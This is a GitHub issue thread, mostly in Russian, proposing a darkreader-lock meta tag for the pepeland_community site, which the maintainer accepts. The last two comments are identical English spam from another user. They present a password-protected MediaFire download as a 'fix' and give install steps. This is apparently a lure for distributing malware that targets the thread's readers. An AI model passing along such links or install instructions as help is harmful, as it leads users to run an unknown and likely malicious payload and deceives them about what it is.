### ISSUE TITLE
Добавление меты для Dark Reader

### ISSUE THREAD

**Issue by kel-cu** [Andcool-Systems/pepeland_community#2]
Добавив `<meta name="darkreader-lock">` в head, расширение будет автоматически отключать себя на сайте

### С Dark Reader:
![изображение](https://github.com/user-attachments/assets/29bd8aa1-499a-4689-a323-852cc8d44318)

### Без
![изображение](https://github.com/user-attachments/assets/ac04a7c0-d250-4db1-8c64-864655a14fc5)

**Comment by Andcool-Systems** [comment]
Прямо с языка снял

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
